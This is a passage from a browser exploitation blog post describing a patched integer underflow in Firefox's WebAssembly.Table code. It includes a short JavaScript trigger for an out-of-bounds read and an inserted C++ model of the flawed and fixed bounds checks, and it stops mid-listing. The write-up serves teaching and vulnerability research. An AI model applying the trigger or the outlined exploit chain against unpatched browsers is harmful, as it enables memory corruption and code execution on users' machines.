Firefox Vulnerability Research

By Arthur Gerkis and David Barksdale


This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.


In this post we start with an integer underflow in part of Firefox’s WebAssembly code and use it to read and write memory in the sandboxed content process. In later posts we will then use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.


WebAssembly.Table Integer Underflow (CVE-2018-2093)


This vulnerability was reported to Mozilla by Alex Gaynor as Bug #1415291 and fixed in Firefox 58 and 59.


The vulnerability is triggered through a WebAssembly.Table object, an array-like structure that stores function references and bridges WebAssembly and JavaScript. The following JavaScript code causes a memory read outside the bounds of the table.



// Creates a new WebAssembly Table object.
var wasmTable = new WebAssembly.Table({
    // Provides type of the element.
    element: 'anyfunc',
    // Provides initial size of the table (length of the elements).
    initial: 0
});
// Tries to get the function reference at the index 0x100.
wasmTable.get(0x100);
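The following is an added illustration, not code from the original post or from Firefox: a constructed, simplified model of the table's index check. The pre-fix comparison against `length - 1` is an assumed shape (the page does not show the check itself); it is placed beside a check that cannot wrap to make the underflow on a zero-length table visible.

```cpp
#include <cstdint>
#include <cstdio>
#include <vector>

// Constructed, simplified model of a WebAssembly.Table: a vector of
// function-reference slots with a 32-bit length. Not SpiderMonkey's class.
struct ModelTable {
    std::vector<const void*> slots;
    uint32_t length() const { return static_cast<uint32_t>(slots.size()); }
};

// Assumed shape of the pre-fix bounds check: the index is compared
// against "length - 1" in unsigned arithmetic. For an empty table the
// subtraction wraps to 0xFFFFFFFF, so every index passes.
bool passesVulnerableCheck(const ModelTable& t, uint32_t index) {
    uint32_t maxIndex = t.length() - 1;   // wraps when length == 0
    return index <= maxIndex;
}

// Equivalent check written as "index < length": no subtraction, so an
// empty table rejects every index.
bool passesFixedCheck(const ModelTable& t, uint32_t index) {
    return index < t.length();
}

// True when a check admits an index that lies past the table's storage,
// i.e. the condition under which get() would read out of bounds.
bool checkAllowsOob(bool (*check)(const ModelTable&, uint32_t),
                    uint32_t tableLength, uint32_t index) {
    ModelTable t;
    t.slots.assign(tableLength, nullptr);
    return check(t, index) && index >= t.length();
}

bool vulnerableAllowsOob(uint32_t tableLength, uint32_t index) {
    return checkAllowsOob(passesVulnerableCheck, tableLength, index);
}

bool fixedAllowsOob(uint32_t tableLength, uint32_t index) {
    return checkAllowsOob(passesFixedCheck, tableLength, index);
}

int main() {
    // Mirrors the trigger above: initial size 0, index 0x100.
    std::printf("vulnerable check admits index 0x100 on empty table: %s\n",
                vulnerableAllowsOob(0, 0x100) ? "yes" : "no");
    std::printf("fixed check admits index 0x100 on empty table: %s\n",
                fixedAllowsOob(0, 0x100) ? "yes" : "no");
    return 0;
}
```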

The JavaScript constructor triggers a call to WasmTableObject::construct() shown below.



/* static */ WasmTableObject*
WasmTableObject::create(JSContext* cx, const Limits& limits)
{
    RootedObject proto(cx, &cx->global()->getPrototype(JSProto_WasmTable).toOb ..
